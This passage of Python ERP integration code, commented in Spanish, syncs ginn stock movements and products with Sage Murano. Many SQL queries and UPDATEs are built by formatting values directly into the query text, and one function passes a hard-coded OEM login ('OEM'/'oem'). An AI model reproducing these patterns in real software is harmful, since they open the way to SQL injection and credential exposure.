CODEMPRESA, ejercicio, periodo, fecha,\n serie,\n documento, codigo_articulo, codigo_almacen,\n partida, grupo_talla, codigo_talla,\n tipo_movimiento, unidades, unidad_medida,\n precio, importe, unidades2, unidad_medida2,\n factor_conversion, comentario, canal_div,\n ubicacion, origen_movimiento, numero_serie_lc,\n id_proceso_IME, guid_movposicion)\n if simulate:\n res = [sql_movstock]\n else:\n c.run_sql(sql_movstock)\n # pylint: disable=redefined-variable-type\n if procesar:\n res = fire(id_proceso_IME, acumular_campos_personalizados=False)\n else: # No proceso la importación. Todo ha ido bien hasta ahora.\n # Devuelvo el guid, que me vale como True también.\n res = id_proceso_IME\n return res\n\n\ndef delete_articulo(articulo, codigo_almacen=None, observaciones=None,\n serie='API', fecha=None, guid_proceso=None,\n simulate=False, procesar=True):\n \"\"\"\n Elimina el artículo en Murano mediante la creación de un movimiento de\n stock negativo de ese código de producto.\n \"\"\"\n # Buscamos el producto que tiene asignado ahora en Murano para darlo de\n # baja de ESE producto en concreto. 
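\n # Boceto: la baja equivale a un create_articulo con cantidad=-1 contra\n # el producto vigente en Murano, p. ej.:\n # delete_articulo(articulo, observaciones="Baja por ajuste")\n # 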
Seguramente no sea el que tiene\n # asignado en ginn y fallará si intentamos crear el movimiento negativo\n # contra él.\n res = False\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n movserie = get_ultimo_movimiento_articulo_serie(conn, articulo)\n if movserie:\n id_producto_anterior = movserie[\"CodigoArticulo\"]\n producto_anterior = get_producto_ginn(id_producto_anterior)\n res = create_articulo(articulo, cantidad=-1,\n producto=producto_anterior,\n codigo_almacen=codigo_almacen,\n observaciones=observaciones,\n serie=serie, fecha=fecha,\n guid_proceso=guid_proceso,\n procesar=procesar,\n simulate=simulate)\n else:\n logging.warning(\"El artículo %s no existe en Murano.\", articulo.codigo)\n return res\n\n\ndef consumir(productoCompra, cantidad, almacen=None, consumo=None):\n \"\"\"\n Decrementa las existencias del producto recibido en la cantidad indicada\n mediante registros de movimientos de stock en Murano en el almacén\n principal si no se indica otro como tercer parámetro; o en el almacén del\n silo correspondiente si almacen es None, el producto de compra es de\n granza y se especifica un consumo.\n \"\"\"\n if not almacen:\n if not productoCompra.es_granza():\n almacen = pclases.Almacen.get_almacen_principal()\n # Los consumos de materia prima siempre se hacen desde el almacén\n # principal. EXCEPTO los de granza, que se hacen desde un silo que\n # se trata como almacén en Murano.\n else:\n try:\n almacen = consumo.silo\n except AttributeError:\n raise ValueError(\"Si no especifica un almacén debe indicar \"\n \"el consumo origen de ginn como referencia.\")\n res = update_stock(productoCompra, -cantidad, almacen)\n if consumo: # Si he recibido el consumo, actualizo el valor `api`.\n consumo.api = res\n consumo.sync()\n return res\n\n\ndef get_existencias_silo(silo):\n \"\"\"\n Recibe un silo de ginn y devuelve un diccionario con los productos y sus\n existencias en el almacén correspondiente de Murano.\n Cada silo tiene un almacén en Murano.\n 0. Se determina el almacén correspondiente en Murano al silo recibido.\n 1. Se buscan los productos que hay en ese almacén y sus existencias.\n 2. Se monta un diccionario con los productos de ginn correspondientes a\n los productos de Murano de ese almacén.\n 3. Se almacena en el diccionario, para cada producto de ginn, las\n existencias consultadas anteriormente.\n 4. 
Se devuelve ese diccionario.\n \"\"\"\n res = {}\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n rs_ejercicio = conn.run_sql(\"\"\"SELECT MAX(Ejercicio) AS ejercicio\n FROM {}.dbo.AcumuladoStock\n WHERE CodigoEmpresa = {};\n \"\"\".format(conn.get_database(),\n CODEMPRESA))\n try:\n ejercicio = rs_ejercicio[0]['ejercicio']\n except (IndexError, KeyError):\n ejercicio = datetime.date.today().year\n almacen = buscar_almacen_silo(silo)\n sql_silos = \"\"\"SELECT AcumuladoStock.Ejercicio,\n AcumuladoStock.CodigoEmpresa,\n AcumuladoStock.CodigoAlmacen,\n Articulos.CodigoFamilia,\n Articulos.CodigoSubfamilia,\n Familias.Descripcion,\n Subfamilias.Descripcion AS Descripcion2,\n AcumuladoStock.CodigoArticulo,\n Articulos.DescripcionArticulo,\n AcumuladoStock.CodigoTalla01_,\n AcumuladoStock.Partida,\n ArticulosSeries.NumeroSerieLc,\n Articulos.UnidadMedida2_,\n Articulos.UnidadMedidaAlternativa_,\n AcumuladoStock.UnidadSaldo,\n AcumuladoStock.UnidadSaldoTipo_,\n Articulos.TipoEnvase_,\n Articulos.PrecioCompra,\n ArticulosSeries.GEO_CosteUnidadEspecifica,\n ArticulosSeries.UnidadesSerie,\n ArticulosSeries.PesoBruto_,\n ArticulosSeries.PesoNeto_,\n ArticulosSeries.MetrosCuadrados\n FROM AcumuladoStock\n INNER JOIN Articulos ON AcumuladoStock.CodigoEmpresa =\n Articulos.CodigoEmpresa\n AND AcumuladoStock.CodigoArticulo = Articulos.CodigoArticulo\n LEFT OUTER JOIN ArticulosSeries ON\n AcumuladoStock.Partida = ArticulosSeries.Partida AND\n AcumuladoStock.CodigoAlmacen = ArticulosSeries.CodigoAlmacen\n AND\n AcumuladoStock.CodigoTalla01_ = ArticulosSeries.CodigoTalla01_\n AND Articulos.CodigoEmpresa =\n ArticulosSeries.CodigoEmpresa AND\n Articulos.CodigoArticulo = ArticulosSeries.CodigoArticulo\n LEFT OUTER JOIN Familias AS Subfamilias ON\n Articulos.CodigoFamilia = Subfamilias.CodigoFamilia AND\n Articulos.CodigoSubfamilia = Subfamilias.CodigoSubfamilia AND\n Articulos.CodigoEmpresa = Subfamilias.CodigoEmpresa\n LEFT OUTER JOIN Familias ON\n Articulos.CodigoFamilia = Familias.CodigoFamilia AND\n Articulos.CodigoEmpresa = Familias.CodigoEmpresa AND\n Familias.CodigoSubfamilia = '**********'\n WHERE AcumuladoStock.Periodo = 99\n AND AcumuladoStock.Ejercicio = %d\n AND AcumuladoStock.CodigoAlmacen = '%s'\n AND AcumuladoStock.CodigoEmpresa = '%s'\n AND AcumuladoStock.UnidadSaldo <> 0\n ORDER BY FechaUltimaEntrada DESC;\"\"\" % (\n ejercicio, almacen, CODEMPRESA)\n res_murano = conn.run_sql(sql_silos)\n for registro in res_murano:\n codigo_producto = registro['CodigoArticulo']\n existencias = registro['UnidadSaldo']\n producto = get_producto_ginn(codigo_producto)\n res[producto] = float(existencias)\n return res\n\n\ndef get_ocupado_silo(silo):\n \"\"\"\n Devuelve la cantidad total de existencias que hay en un silo, sea del\n producto que sea.\n \"\"\"\n stock_murano = get_existencias_silo(silo)\n ocupado = sum([stock_murano[producto] for producto in stock_murano])\n return ocupado\n\n\ndef get_carga_mas_antigua_silo(silo):\n \"\"\"\n Devuelve una estructura similar a las cargas de ginn pero con los datos\n de Murano. Ver pclases.Silo.get_carga_mas_antigua\n \"\"\"\n CargaSilo = namedtuple('CargaSilo',\n ['productoCompra', 'siloID', 'cantidad'])\n productos_cargados = get_existencias_silo(silo)\n cs = None\n for pc in productos_cargados:\n # Solo devolverá uno: el último. 
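\n # Forma del valor devuelto (boceto; campos de la namedtuple de arriba):\n # CargaSilo(productoCompra=<ProductoCompra>, siloID=3, cantidad=12500.0)\n # 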
Las cargas están ordenadas por fecha\n # de carga de la más nueva a la más antigua.\n cs = CargaSilo(pc, silo.id, productos_cargados[pc])\n return cs\n\n\ndef get_producto_ginn(codigo_murano):\n \"\"\"\n Devuelve el objeto producto de ginn (de compra o de venta) según el código\n recibido de Murano.\n \"\"\"\n # FIXME: Implementar otra forma de que la relación sea biyectiva.\n # OJO: HARCODED. Si se crean nuevos productos, hay que tener cuidado de que\n # se respete esta codificación.\n if codigo_murano.startswith(\"PC\"):\n clase = pclases.ProductoCompra\n elif codigo_murano.startswith(\"PV\"):\n clase = pclases.ProductoVenta\n else:\n raise NotImplementedError(\"Solo se permite buscar por código PV|PC\")\n idginn = int(codigo_murano.replace(\"PC\", \"\").replace(\"PV\", \"\"))\n res = clase.get(idginn)\n return res\n\n\ndef buscar_almacen_silo(silo):\n \"\"\"\n Devuelve el código de almacén de Murano del silo recibido.\n \"\"\"\n # OJO: HARCODED\n # Podría tirar de la tabla almacenes y buscar por nombre, pero prefiero\n # ahorrar llamadas al SQLServer.\n almacenes = {\"Silo 1\": \"SIL1\",\n \"Silo 2\": \"SIL2\",\n \"Silo 3\": \"SIL3\",\n \"Silo 4\": \"SIL4\",\n \"Silo 5\": \"SIL5\",\n \"Silo 6\": \"SIL6\",\n \"Silo 7\": \"SIL7\",\n \"Silo 8\": \"SIL8\"}\n try:\n almacen = almacenes[silo.nombre]\n except KeyError:\n almacen = None\n return almacen\n\n\ndef _str_time(t):\n \"\"\"\n Devuelve una cadena con los segundos recibidos en formato minutos:segundos\n \"\"\"\n minutos = int(t // 60)\n segundos = t % 60\n if minutos:\n res = \"{:d}:{:0>5.2f} m\".format(minutos, segundos)\n else:\n res = \"{:.2f} s\".format(segundos)\n return res\n\n\ndef _get_fin_proceso_importacion_retcode(guid):\n \"\"\"\n Busca un registro concreto en la tabla de Murano encargada de procesar\n las importaciones. Si ese registro existe, la importación ha finalizado.\n Si en ese registro el valor del campo sysStatus es 0, el proceso ha\n terminado bien. Si es 2 (u otro valor, en general) ha habido algún error.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n sql = \"\"\"SELECT sysStatus\n FROM {}.dbo.lsysTraceIME\n WHERE IdProcesoIME=CONVERT(uniqueidentifier, '{}')\n AND sysTraceDescription LIKE 'Fin proceso de importaci%n';\"\"\".format(\n conn.get_database(), guid)\n try:\n # FIXME: Ojo porque puede crear 2 registros con el mismo texto y guid.\n # ¿Mismo sysStatus también? Espero que sí... Preguntar a Sage.\n res = conn.run_sql(sql)[0]['sysStatus']\n except IndexError:\n res = None\n return res\n\n\ndef _get_fin_proceso_acumulacion_retcode(guid):\n \"\"\"\n Busca un registro concreto en la tabla de Murano encargado de acumular los\n campos personalizados en las importaciones.\n Si ese registro existe, la importación ha finalizado.\n Si en ese registro el valor del campo sysStatus es 0, el proceso ha\n acumulado bien. 
Si es 2 (u otro valor, en general) ha habido algún error.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n sql = \"\"\"SELECT sysStatus\n FROM {}.dbo.LsysTraceIME\n WHERE IdProcesoIME=CONVERT(uniqueidentifier, '{}')\n AND sysTraceDescription LIKE 'Fin proceso de acumulaci%n';\"\"\".format(\n conn.get_database(), guid)\n try:\n res = conn.run_sql(sql)[0]['sysStatus']\n except IndexError:\n res = None\n return res\n\n\ndef espera_activa(funcion, parametros, res=None, timeout=30, tick=5):\n \"\"\"\n Ejecuta la función recibida aplicando la **lista** de parámetros en\n intervalos de `tick`segundos hasta llegar al tiempo indicado en `timeout`\n o hasta que el valor devuelto por la función sea diferente al recibido\n en `res`.\n Devuelve lo que devuelva la función `funcion`.\n \"\"\"\n antes = time.time()\n if VERBOSE:\n logging.warning(\"Iniciando espera activa...\")\n tries = 0\n max_tries = timeout/tick\n while timeout > 0:\n retCode = funcion(*parametros)\n tries += 1\n if retCode != res:\n success = True\n res = retCode\n timeout = 0\n else:\n success = False\n time.sleep(tick)\n timeout -= tick\n tiempo = time.time() - antes\n strlog = \"[{}] Espera activa finalizada en {}/{} intentos ({:.2f} s)\"\\\n \".\".format(success and '✔' or '✘', tries, max_tries, tiempo)\n if VERBOSE:\n logging.warning(strlog)\n return res\n\n\n# pylint: disable=too-many-statements\ndef fire(guid_proceso, ignore_errors=False,\n acumular_campos_personalizados=True):\n \"\"\"\n Lanza el proceso de importación de Murano de todos los movimientos de\n stock de la tabla temporal.\n\n ~~Devuelve 0 si el proceso se completó con éxito o 1 en caso contrario.~~\n\n Devuelve True si se completó con éxito o False en caso contrario.\n Ya no devuelve None si Murano lanzó asíncronamente los procesos de\n importación y acumulación. Ahora se hace espera activa hasta que acabe\n el proceso o el tiempo máximo de espera (único caso en que devolvería\n None).\n \"\"\"\n antes = time.time()\n strerror = \"No puede ejecutar código nativo de Murano. Necesita instalar\"\\\n \" la biblioteca win32com y lanzar esta función desde una \"\\\n \"plataforma donde se encuentre instalado Sage Murano.\"\n if not LCOEM:\n raise NotImplementedError(strerror)\n if VERBOSE:\n logging.info(\"Inicializando OEM...\")\n burano = win32com.client.Dispatch(\"LogicControlOEM.OEM_EjecutaOEM\")\n burano.InicializaOEM(CODEMPRESA,\n \"OEM\",\n \"oem\",\n \"\",\n r\"LOGONSERVER\\MURANO\",\n \"GEOTEXAN\")\n ahora = time.time()\n tiempo_inicializacion = ahora - antes\n str_tiempo_inicializacion = _str_time(tiempo_inicializacion)\n if VERBOSE:\n logging.info(\"OEM inicializada en %s\", str_tiempo_inicializacion)\n retCode = None\n operacion = \"ImportaIME\"\n strverbose = \"Lanzando proceso de importación `%s` con GUID `%s`...\" % (\n operacion, guid_proceso)\n if VERBOSE:\n logging.info(strverbose)\n if VERBOSE and DEBUG:\n print(strverbose)\n retCode = burano.EjecutaOEM(\"LCCImExP.LcImExProceso\", operacion,\n str(guid_proceso), 1, 1, 4)\n # 1 = No borrar registros IME al finalizar.\n # 1 = No borrar registros con errores ni siquiera cuando el primer\n # parámetro esté a 0.\n # 0 = Ejecutar en todos los módulos.\n # 4 = Procesar solo para el módulo de gestión. 
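\n # Boceto del patrón de sondeo que se usa más abajo: consultar el estado\n # en LsysTraceIME hasta que cambie o venza el timeout.\n # ret = espera_activa(_get_fin_proceso_importacion_retcode,\n # [guid_proceso], None, timeout=40, tick=5)\n # 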
[20160704] Cambiamos 0 por 4\n # ### [20170601] Espera activa.\n # DONE: En lugar de usar el código de retorno, como resulta que al final\n # las llamadas a la dll son asíncronas, haremos un SELECT contra\n # LsysTraceIME buscando el GUID en cuestión y en sysTraceDescription el\n # texto 'Fin proceso de importación\".\n # Si sysStatus es 0, ha acabado bien. Si es 2 (u otro valor), ha habido\n # fallos.\n # **Si el registro no existe, es que no ha terminado todavía.** Hacer\n # espera activa hasta que aparezca el registro.\n retCode = None # XXX: [20170601] Por algún motivo que ni Félix ni yo\n # adivinamos, la lcOEM ha empezado a devolver 1 aunque importe\n # correctamente los registros. Por tanto, el valor de retorno ya no es\n # útil para detectar nada. Usaremos ya siempre la espera activa, que es lo\n # único fiable.\n if retCode is None:\n retCode = espera_activa(_get_fin_proceso_importacion_retcode,\n [guid_proceso], retCode, timeout=40, tick=5)\n # ### EOEspera_activa\n strverbose = \"Importación `%s` concluida con código de retorno: %s\" % (\n guid_proceso, retCode)\n if VERBOSE:\n logging.info(strverbose)\n if VERBOSE and DEBUG:\n print(strverbose)\n # Si retcode es 1: cagada. Si es 0: éxito\n # ¿Y si es None? Lo he visto en procesos con errores.\n # Mucho me temo que si es None, no lo ha procesado. Y no se procesan más\n # adelante. Se quedan pendiente para siempre.\n # **A no ser que se procese a mano desde Murano**. Entonces se desbloquean\n # todos los pendientes y deja entrar más.\n # **Pero si se hace a mano no se ejecutan el AcumularCamposSeries y el\n # GEO_DIV que divide entre 100.**\n # El GEO_DIV se ejecutará en la siguiente importación, porque se hace\n # para todos los pendientes. Pero el otro necesita un GUID de proceso\n # y habría que editarlo y ejecutarlo a mano uno por uno de los pendientes.\n # O bien tirar del Sr. Lobo y que haga el fire de todos los pendientes.\n # [2016/08/30] UPDATE: En la versión 2016.70.000 se corrige el bug de\n # Murano. Ya no es necesario usar el canal DIV.\n if retCode is None: # Solo ocurre si se alcanza timeout en espera_activa\n if VERBOSE:\n logging.warning(\"Se cambia el valor None por 1 (FAIL).\")\n retCode = 1\n if retCode and not ignore_errors:\n strerr = \"¡PROCESO DE IMPORTACIÓN %s CON ERRORES!\"\\\n \" No se lanza el script de acumulación de stock.\" % (\n guid_proceso)\n logging.error(strerr)\n else:\n if retCode:\n strerr = \"¡PROCESO DE IMPORTACIÓN %s CON ERRORES!\" % (guid_proceso)\n logging.error(strerr)\n # Después de cada proceso hay que invocar al cálculo que acumula los\n # campos personalizados:\n # FIXED: No ejecuta el cálculo. Era por las '' alrededor del guid.\n # Según el .chm de ayuda los parámetros van sin encerrar en nada\n # aunque sean cadena.\n nombrescript = \"AcumularCamposNuevosSeries\"\n paramsscript = \"Label:=Inicio, idProcesoIME:=%s\" % guid_proceso\n if not acumular_campos_personalizados:\n # Si la importación es de movimiento de productos sin campos\n # personalizados, no tiene sentido perder 30 segundos en intentar\n # acumular nada.\n strverbose = \"Se ignora script `%s` con GUID `%s`...\" % (\n nombrescript, guid_proceso)\n if VERBOSE:\n logging.info(strverbose)\n if VERBOSE and DEBUG:\n print(strverbose)\n else:\n strverbose = \"Lanzando script `%s` con GUID `%s`...\" % (\n nombrescript, guid_proceso)\n if VERBOSE:\n logging.info(strverbose)\n if VERBOSE and DEBUG:\n print(strverbose)\n retCode = burano.EjecutaScript(nombrescript, paramsscript)\n # retCode devuelve (True, ...) 
si se hace con éxito. El problema es\n # que no sé si retCode[0] será False cuando falla.\n # ### Fuerzo espera activa para obtener el resultado **real**\n # (la llamada dentro de la dll parece ser asíncrona y el valor de\n # retorno, si lo hay, no es de fiar. Puede que siempre sea True\n # pase lo que pase por dentro de Murano)\n retCode = None\n if retCode is None:\n retCode = espera_activa(_get_fin_proceso_acumulacion_retcode,\n [guid_proceso], retCode, timeout=20,\n tick=5)\n strverbose = \"Ejecución `%s` (GUID `%s`) \"\\\n \"concluida con código de retorno: %s\" % (\n nombrescript, guid_proceso, retCode)\n if VERBOSE:\n logging.info(strverbose)\n if VERBOSE and DEBUG:\n print(strverbose)\n # ## Ya no es necesario el script del canal DIV. Sage solucionó el bug.\n # nombrescript = \"GEO_DividirStock\"\n # paramsscript = \"Label:=Inicio\"\n # strverbose = \"Lanzando script `%s`...\" % (\n # nombrescript)\n # logging.info(strverbose)\n # if VERBOSE and DEBUG:\n # print(strverbose)\n # retCode = burano.EjecutaScript(nombrescript, paramsscript)\n # strverbose = \"Ejecución `%s` concluida con código de retorno: %s\" % (\n # nombrescript, retCode)\n # logging.info(strverbose)\n # if VERBOSE and DEBUG:\n # print(strverbose)\n # El código de retorno es 1 ó 2 para error y 0 para éxito o bien una tupla\n # con True/False en la primera posición. Cambio a boolean.\n if VERBOSE:\n strres = \"murano:ops:fire -> Código de retorno: {} ({})\".format(\n retCode, type(retCode))\n print(strres)\n logging.info(strres)\n if isinstance(retCode, int):\n res = not bool(retCode)\n else:\n try:\n res = retCode[0]\n except IndexError: # ¿Qué demonios es?\n res = bool(retCode)\n except TypeError: # Es None. Lo interpretará como False la invocadora\n res = None\n if VERBOSE:\n strres = \"murano:ops:fire -> Valor devuelto: {} ({})\".format(\n res, type(res))\n try:\n print(strres)\n logging.info(strres)\n except IOError:\n # Por un error extraño en el ordenador de cemento, que lanza\n # un IOError Errno 9 Bad file descriptor. 
Probablemente por no\n # tener salida estándar (se abre sin ventana de \"terminal\").\n pass\n ahora = time.time()\n tiempo_fire = ahora - antes\n str_tiempo_fire = _str_time(tiempo_fire)\n if VERBOSE:\n logging.info(\"Proceso de importación `%s` finalizado en %s\",\n guid_proceso, str_tiempo_fire)\n return res\n\n\ndef corregir_dimensiones_articulo(articulo, peso_bruto=None, peso_neto=None,\n metros_cuadrados=None):\n \"\"\"\n Corrige el peso bruto, neto y metros cuadrados del artículo recibido\n para poner en Murano los indicados por parámetro o los valores\n de ginn para el artículo si son None.\n \"\"\"\n if peso_bruto is None:\n peso_bruto = articulo.peso_bruto\n if peso_neto is None:\n peso_neto = articulo.peso_neto\n if metros_cuadrados is None:\n metros_cuadrados = articulo.superficie\n if metros_cuadrados is None:\n metros_cuadrados = 0\n codigo = articulo.codigo\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n tablas = ['ArticulosSeries', 'MovimientoArticuloSerie',\n 'GEO_LineasSeriesCargadas', 'GEO_Pales']\n res = True\n for tabla in tablas:\n SQL = r\"\"\"UPDATE %s.dbo.%s\n SET PesoBruto_ = %f,\n PesoNeto_ = %f,\n MetrosCuadrados = %f\n WHERE NumeroSerieLc = '%s'\n AND CodigoEmpresa = '%s';\n \"\"\" % (conn.get_database(), tabla, peso_bruto, peso_neto,\n metros_cuadrados, codigo, CODEMPRESA)\n res = conn.run_sql(SQL) and res\n return res\n\n\ndef _get_peso_bruto_murano(articulo):\n \"\"\"\n Devuelve el peso bruto que guarda Murano para el artículo de ginn recibido.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n SQL = r\"\"\"SELECT PesoBruto_ FROM %s.dbo.ArticulosSeries\n WHERE NumeroSerieLc = '%s'\n AND CodigoEmpresa = %d;\"\"\" % (conn.get_database(),\n articulo.codigo,\n CODEMPRESA)\n try:\n res = conn.run_sql(SQL)[0]['PesoBruto_']\n except IndexError:\n res = None\n else:\n res = float(res) # Viene como Decimal()\n return res\n\n\ndef _get_peso_neto_murano(articulo):\n \"\"\"\n Devuelve el peso neto que guarda Murano para el artículo de ginn recibido.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n SQL = r\"\"\"SELECT PesoNeto_ FROM %s.dbo.ArticulosSeries\n WHERE NumeroSerieLc = '%s'\n AND CodigoEmpresa = %d;\"\"\" % (conn.get_database(),\n articulo.codigo,\n CODEMPRESA)\n try:\n res = conn.run_sql(SQL)[0]['PesoNeto_']\n except IndexError:\n res = None\n else:\n res = float(res)\n return res\n\n\ndef _get_superficie_murano(articulo):\n \"\"\"\n Devuelve los metros cuadrados que guarda Murano para el artículo de ginn\n recibido.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n SQL = r\"\"\"SELECT MetrosCuadrados FROM %s.dbo.ArticulosSeries\n WHERE NumeroSerieLc = '%s'\n AND CodigoEmpresa = %d;\"\"\" % (conn.get_database(),\n articulo.codigo,\n CODEMPRESA)\n try:\n res = conn.run_sql(SQL)[0]['MetrosCuadrados']\n except IndexError:\n res = None\n else:\n res = float(res)\n return res\n\n\ndef _get_dimensiones_murano(articulo):\n \"\"\"\n Devuelve el peso bruto, neto y metros cuadrados que guarda Murano para el\n artículo de ginn recibido.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n SQL = r\"\"\"SELECT PesoBruto_, PesoNeto_, MetrosCuadrados\n FROM %s.dbo.ArticulosSeries\n WHERE NumeroSerieLc = '%s'\n AND CodigoEmpresa = '%s';\"\"\" % (conn.get_database(),\n articulo.codigo,\n CODEMPRESA)\n try:\n result = conn.run_sql(SQL)[0]\n except IndexError:\n peso_bruto, peso_neto, superficie = None, None, 
None\n else:\n peso_bruto = result['PesoBruto_']\n peso_neto = result['PesoNeto_']\n superficie = result['MetrosCuadrados']\n peso_bruto = float(peso_bruto)\n peso_neto = float(peso_neto)\n superficie = float(superficie)\n return peso_bruto, peso_neto, superficie\n\n\ndef _get_calidad_murano(articulo):\n \"\"\"\n Devuelve un caracter con la calidad del artículo (A, B ó C) en Murano para\n el artículo de ginn recibido.\n Devuelve None si el artículo no existe, cadena vacía si no tiene calidad y\n la letra que tenga en Murano si la tiene.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n SQL = r\"\"\"SELECT CodigoTalla01_\n FROM %s.dbo.ArticulosSeries\n WHERE NumeroSerieLc = '%s'\n AND CodigoEmpresa = '%s';\"\"\" % (conn.get_database(),\n articulo.codigo,\n CODEMPRESA)\n try:\n result = conn.run_sql(SQL)[0]\n except IndexError:\n calidad = None\n else:\n calidad = result['CodigoTalla01_']\n return calidad\n\n\ndef _get_codigo_pale(articulo):\n \"\"\"\n Devuelve el código de palé que tiene el artículo de ginn en Murano.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n SQL = r\"\"\"SELECT CodigoPale FROM %s.dbo.ArticulosSeries\n WHERE NumeroSerieLc = '%s'\n AND CodigoEmpresa = '%s';\"\"\" % (conn.get_database(),\n articulo.codigo, CODEMPRESA)\n try:\n codigo_pale = conn.run_sql(SQL)[0]['CodigoPale']\n except IndexError:\n codigo_pale = None\n return codigo_pale\n\n\ndef corregir_pale(articulo, pale=None):\n \"\"\"\n Corrige el valor del campo CodigoPale en Murano para el artículo de acuerdo\n al palé o al código de palé recibido.\n \"\"\"\n if not pale:\n pale = articulo.caja.pale\n try:\n codigo_pale = pale.codigo\n except AttributeError:\n codigo_pale = pale\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n SQL = r\"\"\"UPDATE %s.dbo.ArticulosSeries\n SET CodigoPale = '%s'\n WHERE CodigoEmpresa = '%s'\n AND NumeroSerieLc = '%s';\"\"\" % (conn.get_database(),\n codigo_pale,\n CODEMPRESA,\n articulo.codigo)\n res = conn.run_sql(SQL)\n return res\n\n\ndef get_producto_murano(codigo):\n \"\"\"\n Devuelve el registro `Articulos` de Murano que coincide con el código\n (de Murano) recibido. El valor devuelto es un diccionario cuyas claves\n son los nombres de los campos o None si no lo encuentra.\n \"\"\"\n if isinstance(codigo, pclases.ProductoVenta):\n codigo = \"PV{}\".format(codigo.id)\n elif isinstance(codigo, pclases.ProductoCompra):\n codigo = \"PC{}\".format(codigo.id)\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n SQL = r\"\"\"SELECT * FROM %s.dbo.Articulos\n WHERE CodigoEmpresa = '%s'\n AND CodigoArticulo = '%s';\"\"\" % (conn.get_database(),\n CODEMPRESA, codigo)\n try:\n prod_murano = conn.run_sql(SQL)[0]\n prod_murano = AttrDict(prod_murano)\n except IndexError:\n strerr = \"El código %s no existe en Murano.\" % (codigo)\n logging.error(strerr)\n prod_murano = None\n return prod_murano\n\n\ndef producto_murano2ginn(codigo, sync=False):\n \"\"\"\n Vuelca el produco de Murano del código recibido en ginn.\n Respeta el ID de Murano en ginn.\n Si el ID ya existe, machaca la información de ginn con la de Murano si\n el flag «sync» está activo. 
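\n Ejemplo (boceto; el código "PV123" es hipotético):\n\n >>> producto_murano2ginn("PV123", sync=True) # doctest: +SKIP\n\n 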
En otro caso, lanza una excepción.\n \"\"\"\n # p y l i n t: disable=redefined-variable-type\n prod_murano = get_producto_murano(codigo)\n if not prod_murano:\n strerr = \"El código %s no existe en Murano.\" % (codigo)\n raise ValueError(strerr)\n try:\n prod_ginn = get_producto_ginn(codigo)\n except pclases.SQLObjectNotFound:\n res = _create_producto_ginn(prod_murano)\n else:\n if sync:\n res = _update_producto_ginn(prod_ginn, prod_murano)\n else:\n res = None\n return res\n\n\ndef _create_producto_ginn(prod_murano):\n \"\"\"\n Recibe un producto de Murano en forma de diccionario cuyas claves son los\n nombres de los campos y los valores, sus valores.\n Crea un producto en ginn con el ID de Murano y devuelve el objeto\n recién creado.\n \"\"\"\n # p y l i n t: disable=redefined-variable-type\n id_murano = prod_murano['CodigoArticulo']\n if \"PV\" in id_murano:\n res = _create_producto_venta_ginn(prod_murano)\n elif \"PC\" in id_murano:\n res = _create_producto_compra_ginn(prod_murano)\n else:\n raise ValueError(\"Producto {} no soportado.\".format(id_murano))\n return res\n\n\ndef _create_producto_compra_ginn(prod_murano):\n \"\"\"\n Crea un producto de compra en ginn con los datos de prod_murano.\n \"\"\"\n id_murano = prod_murano['CodigoArticulo']\n ide = int(id_murano.replace(\"PC\", \"\"))\n # pylint: disable=unexpected-keyword-arg, no-value-for-parameter\n pc = pclases.ProductoCompra(id=ide)\n _update_producto_ginn(pc, prod_murano)\n return pc\n\n\ndef _create_producto_venta_ginn(prod_murano):\n \"\"\"\n Crea un producto de venta en ginn con los atributos de prod_murano.\n \"\"\"\n id_murano = prod_murano['CodigoArticulo']\n ide = int(id_murano.replace(\"PV\", \"\"))\n try:\n # pylint: disable=unexpected-keyword-arg, no-value-for-parameter\n pv = pclases.ProductoVenta(id=ide)\n if prod_murano['CodigoAreaCompetenciaLc'] == \"ROLLO\":\n pv.camposEspecificosRollo = pclases.CamposEspecificosRollo()\n elif prod_murano['CodigoAreaCompetenciaLc'] == \"BALA\":\n pv.camposEspecificosBala = pclases.CamposEspecificosBala()\n elif prod_murano['CodigoAreaCompetenciaLc'] == \"CAJA\":\n pv.camposEspecificosBala = pclases.CamposEspecificosBala()\n elif prod_murano['CodigoAreaCompetenciaLc'] == \"BIGBAG\":\n pv.camposEspecificosBala = pclases.CamposEspecificosBala()\n else:\n strerror = \"El producto {} no tiene indicado si es rollo, bala, \"\\\n \"caja o bigbag en Murano (campo «Área \"\\\n \"competencia»).\".format(prod_murano['CodigoArticulo'])\n print(strerror)\n logging.error(strerror)\n pv.destroySelf()\n pv = None\n # pylint: disable=broad-except\n except Exception as excepcion:\n # TODO: Hasta que lea directamente el producto de Murano\n # desde el parte y laboratorio, sincronizar manualmente con estas\n # funciones.\n strerror = \"El producto {} no se pudo crear en ginn.\"\\\n \" Expceción: {}\".format(prod_murano['CodigoArticulo'],\n excepcion)\n print(strerror)\n logging.error(strerror)\n pv = None\n else:\n if pv:\n _update_producto_ginn(pv, prod_murano)\n return pv\n\n\ndef _update_producto_ginn(prod_ginn, prod_murano):\n \"\"\"\n Recibe un producto de ginn y otro de Murano en forma de diccionario.\n Actualiza los campos de ginn según los valores del de Murano.\n Devuelve None si no se pudo actualizar, y el producto de ginn sí se pudo.\n \"\"\"\n res = None\n if isinstance(prod_ginn, pclases.ProductoCompra):\n res = _update_producto_compra_ginn(prod_ginn, prod_murano)\n elif isinstance(prod_ginn, pclases.ProductoVenta):\n res = _update_producto_venta_ginn(prod_ginn, prod_murano)\n return 
